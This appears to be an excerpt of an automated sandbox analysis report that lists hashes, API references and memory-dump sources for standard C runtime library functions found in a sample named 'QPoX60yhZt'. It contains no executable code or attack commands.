Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799

Uniqueness

Uniqueness Score: -1.00%

Function 05BF3651 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BF3656
std::_Lockit::_Lockit.LIBCPMT ref: 05BF3665
int.LIBCPMT ref: 05BF367C

Part of subcall function 05BF157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BF1590
Part of subcall function 05BF157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BF15AA

std::locale::_Getfacet.LIBCPMT ref: 05BF3685
std::_Facet_Register.LIBCPMT ref: 05BF36B6
std::_Lockit::~_Lockit.LIBCPMT ref: 05BF36CC
__CxxThrowException@8.LIBVCRUNTIME ref: 05BF36F2

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: 9659b141a56f7e3c5b74b365d98898c8678cfef85b574b9bef607ce58e537763
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: 1511A772E04118EBCB05EBA8C808AEE77B5EF44750F140999EA15B7290DB74AA08C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 05BF385C Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BF3861
std::_Lockit::_Lockit.LIBCPMT ref: 05BF3870
int.LIBCPMT ref: 05BF3887

Part of subcall function 05BF157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BF1590
Part of subcall function 05BF157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BF15AA

std::locale::_Getfacet.LIBCPMT ref: 05BF3890
std::_Facet_Register.LIBCPMT ref: 05BF38C1
std::_Lockit::~_Lockit.LIBCPMT ref: 05BF38D7
__CxxThrowException@8.LIBVCRUNTIME ref: 05BF38FD

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction ID: d1a5ed7103a06cd7d5f9e984efe10f78bb4057eebe64845e955712956193cbe9
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: C311A772E00114EBCB05EBA8D808AFEB7B5EF44710F14499AEA11B7290DF74AA08C794

Uniqueness

Uniqueness Score: -1.00%

Function 00427AC0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
__FindPESection.LIBCMT ref: 00427BEA

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 05C17D27 Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 05C17E37
__FindPESection.LIBCMT ref: 05C17E51

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 59478337781b57b5fbf4f02a0c714a1b03ed9914ac90c6b3a432fe45b9a52c36
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: C6A1B032A04619CFCB15CF68C9C4AAAB7F5FB0A310F254A69DC05AB350D735ED41DB98

Uniqueness

Uniqueness Score: -1.00%

Function 05C069A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05C06BF7,00000001,00000001,?), ref: 05C06A00
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05C06BF7,00000001,00000001,?,?,?,?), ref: 05C06A86
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05C06B80
__freea.LIBCMT ref: 05C06B8D

Part of subcall function 05C07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05C07CDE

__freea.LIBCMT ref: 05C06B96
__freea.LIBCMT ref: 05C06BBB

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction ID: c01349f56507dbd3f0dde7bdb796457906e6969b9d3c7fbccb3b1bde0ce91907
Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction Fuzzy Hash: A151F4B2700216AFDF25AF60CC44EBB77AAEB40750F145A28FD06D7180DB74EDA0D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00411A6C Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00411A98
__cftoe.LIBCMT ref: 00411ACA

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C

Uniqueness

Uniqueness Score: -1.00%

Function 05C01CD3 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 05C01CFF
__cftoe.LIBCMT ref: 05C01D31

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction ID: f6f6d86a415f77f2c93575004009c395c6d8b6d47d1ee2eb488c6bfb1532db6a
Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction Fuzzy Hash: 65513B32A04700ABDF259FA98C48EBEF7E9FF49370F181919F825961C0DB35D641DA60

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9BB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C

Uniqueness

Uniqueness Score: -1.00%

Function 05BFCC22 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05BFCC19,05BFA4C2), ref: 05BFCC30
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05BFCC3E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05BFCC57
SetLastError.KERNEL32(00000000,?,05BFCC19,05BFA4C2), ref: 05BFCCA9

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction ID: 66b05b9f1aab604c7b8cd558e68d8938df64ba1decd0179a076534d47ad8540b
Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction Fuzzy Hash: DB01283234D3155EA7252E74BD8CA672F55FB0077A720027DE328810F0EF216C4857C9

Uniqueness

Uniqueness Score: -1.00%

Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
_free.LIBCMT ref: 00416D50
_free.LIBCMT ref: 00416D78
SetLastError.KERNEL32(00000000), ref: 00416D85
SetLastError.KERNEL32(00000000), ref: 00416D91
_abort.LIBCMT ref: 00416D97

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D

Uniqueness

Uniqueness Score: -1.00%

Function 05C06F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
_free.LIBCMT ref: 05C06FB7
_free.LIBCMT ref: 05C06FDF
SetLastError.KERNEL32(00000000), ref: 05C06FEC
SetLastError.KERNEL32(00000000), ref: 05C06FF8
_abort.LIBCMT ref: 05C06FFE

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: e57efe40ab52a0868188f4b0556beb8bbef376ee0bd9ba09f821f1f3455f697c
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: 94F0F43934861126D2223B796C0CF6B265AAFC17B1F242C24F816D22D0EE21CDA25569

Uniqueness

Uniqueness Score: -1.00%

Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F

Strings

-@, xrefs: 0041727C

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: -@
API String ID: 3177248105-2564449678
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 05BF1AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 05BF1B30
std::system_error::system_error.LIBCPMT ref: 05BF1B3F

Strings

ios_base::failbit set, xrefs: 05BF1B02, 05BF1B39
ios_base::badbit set, xrefs: 05BF1AF7, 05BF1B18
ios_base::eofbit set, xrefs: 05BF1B07

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: e55fc541151fcce231f9938337cc6b8799ecd7e5c0de90b95bb980a9108d0b3f
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: 8EF0F67160432DF7CB10AA98DC48FE97B98DF49690F11C8A5EF4466181E7B57908C3E8

Uniqueness

Uniqueness Score: -1.00%

Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2

Strings

CorExitProcess, xrefs: 00413A97
mscoree.dll, xrefs: 00413A85

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041A950 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 05C0ABB7 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: 62847a9e799833ed9e58479c3437076c12627e855e800ac92cd4fe7b6e4bab30
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: F671A331A043169BCF25DF55CC84ABFBB7AFF41321F181A29E821671D0D7709A92CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004150D5
_free.LIBCMT ref: 004150F5

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05C052CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 05C0533C
_free.LIBCMT ref: 05C0535C

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 0c1c0589c107eec8ea1572afe0a843dc2a60d8c9ed3e0709cc32aed8d37b6277
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: 1141F136B003049FDB24DF78C884A6DB7B2FF85314B1559A8D556EB290DB31EA05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0041B300 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
__alloca_probe_16.LIBCMT ref: 0041B385
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
__freea.LIBCMT ref: 0041B3F1

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E403 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
_free.LIBCMT ref: 0041E468
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9

Uniqueness

Uniqueness Score: -1.00%

Function 05C0E66A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 05C0E673
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05C0E696

Part of subcall function 05C07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05C07CDE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05C0E6BC
_free.LIBCMT ref: 05C0E6CF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05C0E6DE

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction ID: a05a1cfdb273751aff4efa6e43cf42f6001ecf103e78a179c98205dfd320e576
Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction Fuzzy Hash: 8101D47274921D7B273116B66C8CC7B7A6DEAC2AA07141D39F909D2280DE61CD0291B9

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
_free.LIBCMT ref: 00416DD7
_free.LIBCMT ref: 00416DFE
SetLastError.KERNEL32(00000000), ref: 00416E0B
SetLastError.KERNEL32(00000000), ref: 00416E14

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D

Uniqueness

Uniqueness Score: -1.00%

Function 05C07004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,05C025ED,05C07307,?,05C06FAE,00000001,00000364,?,05BFE697,?,?,?,05BFED94,?), ref: 05C07009
_free.LIBCMT ref: 05C0703E
_free.LIBCMT ref: 05C07065
SetLastError.KERNEL32(00000000), ref: 05C07072
SetLastError.KERNEL32(00000000), ref: 05C0707B

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: aeb92a28da6344fddcbdaa84a2e4caac4bc43f218bfd63951b78990ba1654450
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: D101217674460067923A67796C88E6F269EEBC1374B202E24F416A22C0EE25AA12C064

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED6E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041ED86

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
